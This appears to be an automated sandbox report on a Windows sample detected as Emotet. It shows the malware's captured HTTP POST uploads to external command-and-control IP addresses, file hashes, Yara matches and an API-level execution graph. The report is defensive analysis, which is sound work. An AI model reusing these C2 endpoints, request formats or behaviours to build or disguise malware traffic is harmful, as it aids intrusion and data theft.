                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 209.141.54.221/mf37D3hHo2BT/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------------CRPJROu8mMuITH9V
                                  Host: 209.141.54.221:8080
                                  Content-Length: 4628
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.1262411185.94.252.1044436716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:48:24.555603981 CEST682OUTPOST /iXgMw5IajHPl8YAN7YB/fMpMhY2ZgzV/1nmECrP2Ezqoam/NWXlULDZs3bsJjB/p3LYI79/w2aCyOD7bcdtE/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 185.94.252.104/iXgMw5IajHPl8YAN7YB/fMpMhY2ZgzV/1nmECrP2Ezqoam/NWXlULDZs3bsJjB/p3LYI79/w2aCyOD7bcdtE/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=-----------------------3hc2nliStBsMSODJE62qaln
                                  Host: 185.94.252.104:443
                                  Content-Length: 4628
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.1262418174.45.13.118806716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:48:27.434936047 CEST526OUTPOST /Ddrl52fpHV0Ytv/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 174.45.13.118/Ddrl52fpHV0Ytv/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=------------------BqLyxgk1GkivHaCG9j
                                  Host: 174.45.13.118
                                  Content-Length: 4628
                                  Cache-Control: no-cache
                                  Aug 20, 2024 17:48:27.434988022 CEST4628OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 42 71 4c 79 78 67 6b 31 47 6b 69 76 48 61 43 47 39 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 76 72
                                  Data Ascii: --------------------BqLyxgk1GkivHaCG9jContent-Disposition: form-data; name="vrrhteskolrhp"; filename="buhxictpfvdxdd"Content-Type: application/octet-stream(|2q.A@8L{r*DoBRJXQT9&!5I~DaH


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.126241987.106.136.23280806716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:48:51.785458088 CEST569OUTPOST /gfPMhF/Be2SElHPLyLeACf/UucmketfQMMC3NqYN/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 87.106.136.232/gfPMhF/Be2SElHPLyLeACf/UucmketfQMMC3NqYN/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------5VkCfPKqCt
                                  Host: 87.106.136.232:8080
                                  Content-Length: 4628
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.126242062.75.141.82806716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:48:57.138402939 CEST630OUTPOST /9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------F7zfpJ936g
                                  Host: 62.75.141.82
                                  Content-Length: 4628
                                  Cache-Control: no-cache
                                  Aug 20, 2024 17:48:57.138427973 CEST4628OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 46 37 7a 66 70 4a 39 33 36 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 67 77 78 65 77 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22
                                  Data Ascii: ------------F7zfpJ936gContent-Disposition: form-data; name="gwxew"; filename="psitexztpypnqpo"Content-Type: application/octet-stream=3qJea)/$[fM!z=e8MApb3Xt;o4kn';Ug,-+aUM;


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:11:47:07
                                  Start date:20/08/2024
                                  Path:C:\Users\user\Desktop\ExeFile (356).exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\ExeFile (356).exe"
                                  Imagebase:0x400000
                                  File size:437'248 bytes
                                  MD5 hash:4C1C997C16309A2D391E1D39988000CC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.2389548651.00000000020E4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.2389548651.00000000020E4000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:11:47:07
                                  Start date:20/08/2024
                                  Path:C:\Windows\SysWOW64\provcore\Websocket.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\SysWOW64\provcore\Websocket.exe"
                                  Imagebase:0x400000
                                  File size:437'248 bytes
                                  MD5 hash:4C1C997C16309A2D391E1D39988000CC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.3637813859.0000000000734000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000002.00000002.3637813859.0000000000734000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.3637503164.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000002.00000002.3637503164.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:false

                                  General

                                  Target ID:6
                                  Start time:11:47:52
                                  Start date:20/08/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                  Imagebase:0x7ff7d3e90000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:3.3%
                                    Dynamic/Decrypted Code Coverage:73.1%
                                    Signature Coverage:28.8%
                                    Total number of Nodes:420
                                    Total number of Limit Nodes:27
                                    execution_graph 23991 603060 23995 60307a 23991->23995 23992 60326f 23994 603215 23992->23994 24001 603e40 GetPEB 23992->24001 23993 603e40 GetPEB 23993->23995 23995->23992 23995->23993 23995->23994 23996 603da0 GetPEB 23995->23996 23998 6031c3 RtlAllocateHeap 23995->23998 23996->23995 23998->23994 23998->23995 23999 603283 24002 603da0 GetPEB 23999->24002 24001->23999 24002->23994 24003 40ec40 24008 40ebe0 24003->24008 24005 40ec48 24006 40ec71 VirtualAlloc 24005->24006 24007 40ec8a 24005->24007 24006->24007 24011 40e920 LoadLibraryW 24008->24011 24010 40ec09 24010->24005 24011->24010 24535 410448 72 API calls ___InternalCxxFrameHandler 24599 413948 75 API calls 6 library calls 24315 606d79 24322 606d80 24315->24322 24316 603480 GetPEB 24316->24322 24317 606cd0 GetPEB LoadLibraryW 24317->24322 24318 606e86 LoadLibraryW 24318->24322 24319 606daf 24320 603e40 GetPEB 24320->24322 24321 603da0 GetPEB 24321->24322 24322->24316 24322->24317 24322->24318 24322->24319 24322->24320 24322->24321 24603 418964 CloseHandle 24551 20e2630 Process32Next CloseHandle 24552 20e2430 VirtualProtect VirtualProtect 24012 605c20 24020 6063f0 24012->24020 24014 605c49 ExitProcess 24015 605c25 24015->24014 24063 603e40 GetPEB 24015->24063 24017 605c38 24064 603da0 GetPEB 24017->24064 24019 605c44 24019->24014 24062 60640d 24020->24062 24024 606802 24024->24015 24025 606cb5 24131 60afc0 GetPEB 24025->24131 24026 60647e 24026->24062 24106 607d60 GetPEB CreateFileW SetFileInformationByHandle 24026->24106 24119 6092f0 GetPEB GetTickCount GetCurrentProcessId 24026->24119 24121 606d70 GetPEB LoadLibraryW LoadLibraryW 24026->24121 24028 603da0 GetPEB 24028->24062 24029 606ca8 24130 608a20 GetPEB CreateProcessW 24029->24130 24038 606c9b 24129 608420 GetPEB 24038->24129 24050 606cad 24050->24015 24054 604120 GetPEB 24054->24062 24056 606ca0 24056->24015 24057 603e40 GetPEB 24057->24062 24061 604060 GetPEB 24061->24062 24062->24024 24062->24025 24062->24026 24062->24028 24062->24029 24062->24038 24062->24054 24062->24057 24062->24061 24065 609530 24062->24065 24078 6080d0 24062->24078 24084 6088a0 24062->24084 24094 608660 24062->24094 24107 606f20 GetPEB 24062->24107 24108 609180 GetPEB 24062->24108 24109 6052e0 GetPEB 24062->24109 24110 605f00 GetPEB 24062->24110 24111 609bf0 GetPEB 24062->24111 24112 608f30 GetPEB 24062->24112 24113 608d10 GetPEB 24062->24113 24114 6032d0 GetPEB 24062->24114 24115 601880 GetPEB 24062->24115 24116 603420 GetPEB 24062->24116 24117 60aeb0 GetPEB 24062->24117 24118 60b110 GetPEB CreateProcessW GetCurrentProcessId 24062->24118 24120 609d30 GetPEB 24062->24120 24122 6012a0 GetPEB 24062->24122 24123 6083e0 GetPEB 24062->24123 24124 60acc0 GetPEB 24062->24124 24125 608b50 GetPEB 24062->24125 24126 606080 GetPEB 24062->24126 24127 604670 GetPEB GetCurrentProcessId 24062->24127 24128 607060 GetPEB 24062->24128 24063->24017 24064->24019 24066 609550 24065->24066 24067 609797 OpenSCManagerW 24066->24067 24068 609587 24066->24068 24069 603e40 GetPEB 24066->24069 24071 6097fc 24066->24071 24075 603da0 GetPEB 24066->24075 24132 607950 GetPEB 24066->24132 24067->24066 24068->24062 24069->24066 24072 60981b 24071->24072 24133 603e40 GetPEB 24071->24133 24135 603000 FindFirstFileW FindNextFileW FindClose GetPEB 24072->24135 24074 60980f 24134 603da0 GetPEB 24074->24134 24075->24066 24083 6081a1 24078->24083 24079 603da0 GetPEB 24079->24083 24080 603e40 GetPEB 24080->24083 24081 6081fb CreateFileW 24082 6082f5 24081->24082 24081->24083 24082->24062 24083->24079 24083->24080 24083->24081 24083->24082 24085 6088b4 24084->24085 24086 608a07 24085->24086 24089 6089bb 24085->24089 24090 603e40 GetPEB 24085->24090 24093 603da0 GetPEB 24085->24093 24136 603740 24085->24136 24182 603480 24085->24182 24162 603670 24086->24162 24089->24062 24090->24085 24091 608a10 24091->24062 24093->24085 24103 608681 24094->24103 24095 60885b 24097 6087f9 24095->24097 24233 603e40 GetPEB 24095->24233 24097->24062 24099 603480 GetPEB 24099->24103 24100 60886e 24234 603da0 GetPEB 24100->24234 24102 603e40 GetPEB 24102->24103 24103->24095 24103->24097 24103->24099 24103->24102 24104 603da0 GetPEB 24103->24104 24216 604f50 24103->24216 24232 603420 GetPEB 24103->24232 24104->24103 24106->24026 24107->24062 24108->24062 24109->24062 24110->24062 24111->24062 24112->24062 24113->24062 24114->24062 24115->24062 24116->24062 24117->24062 24118->24062 24119->24026 24120->24062 24121->24026 24122->24062 24123->24062 24124->24062 24125->24062 24126->24062 24127->24062 24128->24062 24129->24056 24130->24050 24131->24024 24132->24066 24133->24074 24134->24072 24135->24068 24137 60376b 24136->24137 24138 603755 24136->24138 24142 60379d 24137->24142 24194 603e40 GetPEB 24137->24194 24192 603e40 GetPEB 24138->24192 24140 60375f 24193 603da0 GetPEB 24140->24193 24146 6037d2 24142->24146 24196 603e40 GetPEB 24142->24196 24144 603791 24195 603da0 GetPEB 24144->24195 24150 60380a 24146->24150 24198 603e40 GetPEB 24146->24198 24148 6037c6 24197 603da0 GetPEB 24148->24197 24154 603836 24150->24154 24200 603e40 GetPEB 24150->24200 24152 6037fe 24199 603da0 GetPEB 24152->24199 24158 60388c 24154->24158 24202 603e40 GetPEB 24154->24202 24156 60382a 24201 603da0 GetPEB 24156->24201 24158->24085 24160 603880 24203 603da0 GetPEB 24160->24203 24163 603480 GetPEB 24162->24163 24165 603684 24163->24165 24164 6036a5 24168 6036da 24164->24168 24206 603e40 GetPEB 24164->24206 24165->24164 24204 603e40 GetPEB 24165->24204 24167 603699 24205 603da0 GetPEB 24167->24205 24173 603702 24168->24173 24208 603e40 GetPEB 24168->24208 24171 6036ce 24207 603da0 GetPEB 24171->24207 24176 603733 DeleteFileW 24173->24176 24210 603e40 GetPEB 24173->24210 24175 6036f6 24209 603da0 GetPEB 24175->24209 24176->24091 24179 603722 24211 603da0 GetPEB 24179->24211 24181 60372e 24181->24176 24183 6034a3 24182->24183 24184 6034c8 24183->24184 24212 603e40 GetPEB 24183->24212 24191 6034f0 24184->24191 24214 603e40 GetPEB 24184->24214 24186 6034bc 24213 603da0 GetPEB 24186->24213 24189 6034e4 24215 603da0 GetPEB 24189->24215 24191->24085 24192->24140 24193->24137 24194->24144 24195->24142 24196->24148 24197->24146 24198->24152 24199->24150 24200->24156 24201->24154 24202->24160 24203->24158 24204->24167 24205->24164 24206->24171 24207->24168 24208->24175 24209->24173 24210->24179 24211->24181 24212->24186 24213->24184 24214->24189 24215->24191 24230 604f6c 24216->24230 24217 605283 24219 6052a2 24217->24219 24236 603e40 GetPEB 24217->24236 24218 6052d5 24218->24103 24225 6052cf RtlFreeHeap 24219->24225 24238 603e40 GetPEB 24219->24238 24221 605296 24237 603da0 GetPEB 24221->24237 24223 603e40 GetPEB 24223->24230 24225->24218 24227 6052be 24239 603da0 GetPEB 24227->24239 24229 6052ca 24229->24225 24230->24217 24230->24218 24230->24223 24231 603da0 GetPEB 24230->24231 24235 6041c0 GetPEB 24230->24235 24231->24230 24232->24103 24233->24100 24234->24097 24235->24230 24236->24221 24237->24219 24238->24227 24239->24229 24554 412bb7 70 API calls 3 library calls 24558 20e1840 LoadLibraryA 24300 607e39 24311 607e32 24300->24311 24301 60809a 24302 6080b9 24301->24302 24313 603e40 GetPEB 24301->24313 24303 603480 GetPEB 24303->24311 24304 608037 SetFileInformationByHandle 24304->24311 24306 607ec8 CreateFileW 24306->24302 24306->24311 24307 6080ad 24314 603da0 GetPEB 24307->24314 24308 607fd6 24310 603da0 GetPEB 24310->24311 24311->24301 24311->24303 24311->24304 24311->24306 24311->24308 24311->24310 24312 603e40 GetPEB 24311->24312 24312->24311 24313->24307 24314->24302 24323 5f0000 24325 5f0005 24323->24325 24328 5f002d 24325->24328 24348 5f0456 GetPEB 24328->24348 24331 5f0456 GetPEB 24332 5f0053 24331->24332 24333 5f0456 GetPEB 24332->24333 24334 5f0061 24333->24334 24335 5f0456 GetPEB 24334->24335 24336 5f006d 24335->24336 24337 5f0456 GetPEB 24336->24337 24338 5f007b 24337->24338 24339 5f0456 GetPEB 24338->24339 24342 5f0089 24339->24342 24340 5f00e4 GetNativeSystemInfo 24341 5f0107 VirtualAlloc 24340->24341 24346 5f0029 24340->24346 24344 5f012f 24341->24344 24342->24340 24342->24346 24343 5f03b2 24350 20e27b0 24343->24350 24344->24343 24345 5f0388 VirtualProtect 24344->24345 24345->24344 24345->24346 24349 5f0045 24348->24349 24349->24331 24353 20e1000 24350->24353 24356 20e1030 LoadLibraryW GetProcAddress 24353->24356 24397 20e1b30 24356->24397 24359 20e10a3 24361 20e1b30 SetLastError 24359->24361 24360 20e1091 SetLastError 24393 20e102b ExitProcess 24360->24393 24362 20e10b9 24361->24362 24363 20e10de SetLastError 24362->24363 24364 20e10f0 24362->24364 24362->24393 24363->24393 24365 20e10ff SetLastError 24364->24365 24366 20e1111 24364->24366 24365->24393 24367 20e111c SetLastError 24366->24367 24369 20e112e GetNativeSystemInfo 24366->24369 24367->24393 24370 20e11bc 24369->24370 24371 20e11e9 24370->24371 24372 20e11d7 SetLastError 24370->24372 24400 20e1800 VirtualAlloc 24371->24400 24372->24393 24373 20e1202 24374 20e123d GetProcessHeap RtlAllocateHeap 24373->24374 24401 20e1800 VirtualAlloc 24373->24401 24375 20e127b 24374->24375 24376 20e1257 SetLastError 24374->24376 24380 20e1b30 SetLastError 24375->24380 24376->24393 24377 20e1222 24377->24374 24378 20e122e SetLastError 24377->24378 24378->24393 24381 20e12fb 24380->24381 24382 20e1302 24381->24382 24402 20e1800 VirtualAlloc 24381->24402 24428 20e16c0 GetProcessHeap HeapFree VirtualFree 24382->24428 24383 20e1320 24403 20e1b50 24383->24403 24386 20e136b 24386->24382 24409 20e21a0 24386->24409 24390 20e13ca 24390->24382 24391 20e13eb 24390->24391 24392 20e13ff GetPEB 24391->24392 24391->24393 24392->24393 24398 20e1b3b SetLastError 24397->24398 24399 20e1070 24397->24399 24398->24399 24399->24359 24399->24360 24399->24393 24400->24373 24401->24377 24402->24383 24406 20e1b7d 24403->24406 24404 20e1b30 SetLastError 24405 20e1c32 24404->24405 24407 20e1be9 24405->24407 24429 20e1800 VirtualAlloc 24405->24429 24406->24404 24406->24407 24407->24386 24410 20e21dd IsBadHugeReadPtr 24409->24410 24419 20e13b5 24409->24419 24412 20e2207 24410->24412 24410->24419 24413 20e224d 24412->24413 24414 20e2239 SetLastError 24412->24414 24412->24419 24430 20e1a20 VirtualQuery VirtualFree VirtualAlloc 24413->24430 24414->24419 24416 20e2267 24417 20e2273 SetLastError 24416->24417 24421 20e229d 24416->24421 24417->24419 24419->24382 24422 20e1e80 24419->24422 24420 20e23ae SetLastError 24420->24419 24421->24419 24421->24420 24424 20e1eba 24422->24424 24423 20e1fe5 24425 20e1d10 2 API calls 24423->24425 24424->24423 24426 20e1fc1 24424->24426 24431 20e1d10 24424->24431 24425->24426 24426->24390 24428->24393 24429->24407 24430->24416 24432 20e1d29 24431->24432 24434 20e1d1f 24431->24434 24433 20e1d37 24432->24433 24435 20e1d9d VirtualProtect 24432->24435 24433->24434 24438 20e1820 VirtualFree 24433->24438 24434->24424 24435->24434 24438->24434 24613 414920 5 API calls 2 library calls 24439 41092e 24489 411e80 24439->24489 24441 41093a GetStartupInfoW 24442 41094e HeapSetInformation 24441->24442 24443 410959 24441->24443 24442->24443 24490 412a4c HeapCreate 24443->24490 24445 4109a7 24446 4109b2 24445->24446 24516 410905 66 API calls 3 library calls 24445->24516 24517 413a77 86 API calls 4 library calls 24446->24517 24449 4109b8 24450 4109c4 __RTC_Initialize 24449->24450 24451 4109bc 24449->24451 24491 4143af 73 API calls __calloc_crt 24450->24491 24518 410905 66 API calls 3 library calls 24451->24518 24453 4109c3 24453->24450 24455 4109d1 24456 4109d5 24455->24456 24457 4109dd GetCommandLineA 24455->24457 24519 412820 66 API calls 3 library calls 24456->24519 24492 414318 71 API calls 2 library calls 24457->24492 24460 4109ed 24520 41425d 95 API calls 3 library calls 24460->24520 24463 4109f7 24464 410a03 24463->24464 24465 4109fb 24463->24465 24493 413fe7 94 API calls 7 library calls 24464->24493 24521 412820 66 API calls 3 library calls 24465->24521 24469 410a08 24470 410a14 24469->24470 24471 410a0c 24469->24471 24494 4125ff 77 API calls 4 library calls 24470->24494 24522 412820 66 API calls 3 library calls 24471->24522 24475 410a1b 24476 410a20 24475->24476 24477 410a27 24475->24477 24523 412820 66 API calls 3 library calls 24476->24523 24495 413f88 94 API calls 2 library calls 24477->24495 24481 410a2c 24482 410a32 24481->24482 24496 40fa80 24481->24496 24482->24481 24484 410a48 24485 410a56 24484->24485 24524 4127d6 66 API calls _doexit 24484->24524 24525 412802 66 API calls _doexit 24485->24525 24488 410a5b _flsall 24489->24441 24490->24445 24491->24455 24492->24460 24493->24469 24494->24475 24495->24481 24526 4101c0 24496->24526 24499 40fb38 24500 40fb3d RegisterClassExW 24499->24500 24501 40fb6e CreateWindowExW 24500->24501 24502 40fb4f MessageBoxW 24500->24502 24503 40fbb1 MessageBoxW 24501->24503 24504 40fbcf CreateWindowExW CreateWindowExW CreateWindowExW 24501->24504 24502->24484 24503->24484 24528 40e7b0 InitCommonControlsEx CreateWindowExW 24504->24528 24506 40fc70 24529 40e800 11 API calls __except_handler4 24506->24529 24508 40fc7b CreateWindowExW CreateWindowExW CreateWindowExW CreateWindowExW 24530 40e220 9 API calls __except_handler4 24508->24530 24510 40fd48 24531 40f770 143 API calls 24510->24531 24512 40fd4d SetTimer ShowWindow UpdateWindow GetMessageW 24513 40fdc3 24512->24513 24514 40fd97 24512->24514 24513->24484 24515 40fda4 TranslateMessage DispatchMessageW GetMessageW 24514->24515 24515->24513 24515->24515 24516->24446 24517->24449 24518->24453 24520->24463 24524->24485 24525->24488 24527 40fa93 LoadIconW LoadCursorW LoadIconW CreateThread 24526->24527 24527->24499 24532 40ecc0 24527->24532 24528->24506 24529->24508 24530->24510 24531->24512 24533 40ecc6 24532->24533 24614 40e930 81 API calls __except_handler4 24615 607b10 FindFirstFileW FindNextFileW FindClose GetPEB 24563 418a30 76 API calls __cinit 24564 413e30 SetUnhandledExceptionFilter 24617 20e157a SetLastError 24566 60640d 17 API calls 24567 20e1870 GetProcAddress 24570 5f20de GetPEB 24574 20e1890 FreeLibrary 24576 411ee0 6 API calls 2 library calls 24578 4122ed IsProcessorFeaturePresent 24580 20e14a0 9 API calls 24581 412cee 69 API calls __CxxUnhandledExceptionFilter 24625 40edf0 66 API calls std::exception::exception 24585 20e26b0 wcslen wcslen wcslen 24240 40ea80 24245 41025b 24240->24245 24243 41025b std::exception::_Copy_str 66 API calls 24244 40ea9b 24243->24244 24246 4102d8 24245->24246 24256 410269 24245->24256 24268 412a79 DecodePointer 24246->24268 24248 4102de 24269 411e2c 66 API calls __getptd_noexit 24248->24269 24251 410297 RtlAllocateHeap 24252 40ea93 24251->24252 24251->24256 24252->24243 24254 410274 24254->24256 24262 412a13 66 API calls __NMSG_WRITE 24254->24262 24263 412864 66 API calls 6 library calls 24254->24263 24264 41257e GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 24254->24264 24255 4102c4 24266 411e2c 66 API calls __getptd_noexit 24255->24266 24256->24251 24256->24254 24256->24255 24260 4102c2 24256->24260 24265 412a79 DecodePointer 24256->24265 24267 411e2c 66 API calls __getptd_noexit 24260->24267 24262->24254 24263->24254 24265->24256 24266->24260 24267->24252 24268->24248 24269->24252 24586 410881 67 API calls __calloc_crt 24629 413787 TlsAlloc 24633 410d8f 107 API calls 3 library calls 24593 40f5e0 137 API calls 2 library calls 24594 410a9b 5 API calls ___security_init_cookie 24270 604a80 24271 604a92 24270->24271 24278 604aa8 24270->24278 24292 603e40 GetPEB 24271->24292 24273 604a9c 24293 603da0 GetPEB 24273->24293 24275 604ae7 CreateProcessW 24276 604b83 24275->24276 24277 604b07 24275->24277 24280 604b0f 24277->24280 24282 604b43 24277->24282 24296 603e40 GetPEB 24277->24296 24278->24275 24294 603e40 GetPEB 24278->24294 24281 604ad6 24295 603da0 GetPEB 24281->24295 24288 604b6d 24282->24288 24298 603e40 GetPEB 24282->24298 24285 604ae2 24285->24275 24286 604b37 24297 603da0 GetPEB 24286->24297 24290 604b61 24299 603da0 GetPEB 24290->24299 24292->24273 24293->24278 24294->24281 24295->24285 24296->24286 24297->24282 24298->24290 24299->24288 24638 20e21ea 7 API calls 24642 40f3b0 RaiseException __CxxThrowException@8 24643 40f7b0 162 API calls __except_handler4

                                    Executed Functions

                                    Function 0040FA80 Relevance: 63.2, APIs: 23, Strings: 13, Instructions: 250windowregistrythreadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • _memset.LIBCMT ref: 0040FA8E
                                    • LoadIconW.USER32 ref: 0040FAD2
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040FADF
                                    • LoadIconW.USER32 ref: 0040FB0B
                                    • CreateThread.KERNELBASE(00000000,00000000,Function_0000ECC0,00000000,00000002,?), ref: 0040FB23
                                    • RegisterClassExW.USER32(?), ref: 0040FB42
                                    • MessageBoxW.USER32(00000000,Call to RegisterClassEx failed!,Create Process,00000000), ref: 0040FB5B
                                    • CreateWindowExW.USER32(00000000,win32app,Windows Process Manager,00CF0000,80000000,80000000,000001B8,00000258,00000000,00000000,?,00000000), ref: 0040FBA4
                                    • MessageBoxW.USER32(00000000,Call to CreateWindow failed!,Win32 Guided Tour,00000000), ref: 0040FBBC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: Load$CreateIconMessage$ClassCursorRegisterThreadWindow_memset
                                    • String ID: 0$BUTTON$Call to CreateWindow failed!$Call to RegisterClassEx failed!$Cancel$Create Process$Edit$Kill Process$Run$View All Processes$Win32 Guided Tour$Windows Process Manager$win32app
                                    • API String ID: 713769167-1192827546
                                    • Opcode ID: 952da5468408a189c14926ca3cf5cae3a85ce14d76ca3222c90a6cd4c0bb2d80
                                    • Instruction ID: d065e50bf912697da28d798f56a1b3ea1efd5d731bf56130ae663ba60a7ce2a6
                                    • Opcode Fuzzy Hash: 952da5468408a189c14926ca3cf5cae3a85ce14d76ca3222c90a6cd4c0bb2d80
                                    • Instruction Fuzzy Hash: 9A8120B1BD4300BAF220DB50DC56FDA37A8AB98F05F10842AF7017A2D0D7F969458B5E
                                    Function 020E1030 Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
